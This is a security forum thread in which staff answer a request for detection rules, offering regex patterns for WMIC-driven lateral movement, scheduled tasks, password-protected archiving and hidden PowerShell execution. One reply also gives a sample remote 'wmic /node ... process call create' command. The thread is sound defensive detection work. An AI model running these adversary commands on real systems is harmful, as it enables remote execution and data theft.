This website uses Cookies. Click Accept to agree to our website's cookie use as described in our Privacy Policy. Click Preferences to customize your cookie settings.
Accept
Reject
Preferences
Log in to ask a question
Log in to ask a question

WMIC Suspicious Scheduled Tasks and WMIC File Download

Posted on 04-05-2024 06:54 AM
ravivittal
Bronze 5
Bronze 5
Reply posted on --/--/---- --:-- AM

Hi, Does anyone have a sample rule example for detecting WMIC Suspicious Scheduled Tasks and WMIC File Download? I am looking for both Scheduled Task and File Download. My search of Github did not fectch me any results unfortunately. 

0 2 105
Topic Labels
0 Likes
2 REPLIES 2

Posted on --/--/---- --:-- AM
dnehoda
Staff
Reply posted on --/--/---- --:-- AM

Good morning - there are samples out there using WMIC.exe on the community site.  However, they are just calling a different process.  

you could modify this to include schtasks.exe - I included the rest of the events section of the rule below this piece.  I have some other options I could share later.  In this example you just need to determine what you deem suspicious and find where schtasks.exe resides.  

re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*process.*call.*create.*net.*stop.*C:\\Windows\\Temp\\tmp.log"`) nocase

โ€”โ€”โ€”โ€”โ€”โ€”โ€”-/โ€”โ€”โ€”โ€”โ€”โ€”โ€”โ€”โ€”-/
events:
$process.metadata.event_type = "PROCESS_LAUNCH"
$process.principal.hostname = $hostname
$process.target.process.command_line = $command_line

// cisa report referenced cmd /c in their report throughout, can filter this in/out for tuning as needed
// other wmic switches like /user and /password, these have been excluded to focus on the commands being issued since local access does not require these
(
re.regex($process.target.process.command_line, `(|cmd.*/c).*7z.*a.*-p.*c:\\windows\\temp\\.*.7z`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*c:\\Windows\\system32\\pcwrun.exe.*c:\\Users\\Administrator\\Desktop\\Win.exe`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c|cmdbak.*/c).*ping.*-n.*1.*127\.0\.0\.1.*c:\\Windows\\temp\\(putty|tmp).log`) nocase or
// The following line could be swapped for the previous line for a looser match. It was observed during testing that a c2 running powershell logged putty.log as a file creation but not in the command line process event
//re.regex($process.target.process.command_line, `(|cmd.*/c).*ping.*-n.*1.*127\.0\.0\.1`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*dir.*127\.0\.0\.1\\c\$.*/od`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*ping.*-a.*-n.*1`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*process.*call.*create.*net.*stop.*C:\\Windows\\Temp\\tmp.log"`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*\\ADMIN\$\\__.*2>&1`) nocase or
//The following line could be swapped for the previous line for a looser match, but potentially noisier
//re.regex($process.target.process.command_line, `(|cmd.*/c).*\\ADMIN\$\\__`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*net.*use.*127\.0\.0\.1\\ipc\$.*/y.*/d`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*powershell.*start-process.*-filepath.*c:\\windows\\temp\\.*.bat.*-windowstyle.*Hidden`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*rar\.exe.*a.*c:\\Windows\\temp\\.*D:\\.*`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*cmd.*/c.*whoami`) nocase or
re.regex($process.target.process.command_line, `(|cmd.*/c).*xcopy.*c:\\windows\\temp\\hp.*d:\\`) nocase
)

โ€”โ€”โ€”โ€”โ€”โ€”โ€”-/โ€”โ€”โ€”โ€”โ€”โ€”โ€”โ€”โ€”โ€”-/

Posted on --/--/---- --:-- AM
jstoner
Staff
Reply posted on --/--/---- --:-- AM

I don't have anything off the top of my head but I do have a few thoughts about this that perhaps might help a little...

In the rule above, we have a number of different actions that an adversary might take and of course there are a number of permutations, so the following like is a good example of what that command line could look like and pick up the whoami without just looking for all whoami traffic. 

re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*cmd.*/c.*whoami`) nocase

Here is what a scheduled task event being called through wmic might look like. Schtasks in general can be very problematic since there are plenty of good reasons to see scheduled tasks run or be created or modified unless you have a firm grip on them within the org.

wmic /node:<ip address> /user:<userid> process call create "cmd.exe /c schtasks"

Based on this format, you could use the above as a template to look for scheduled tasks being called like this:

re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*cmd.*/c.*schtasks`) nocase

That of course doesn't cover at.exe nor does it cover powershell running schtasks or impacket but hopefully it gets you going in the right direction but please test it first.

Regarding downloads, I'm thinking more along the lines of either wmic being used to call a scripts that has a download function in it or doing something like the above and calling wget, curl or some other app to initiate a download or a file. Again since there are a number of ways to do that, I'm not sure where you want to start but hopefully that gets you going in the right direction.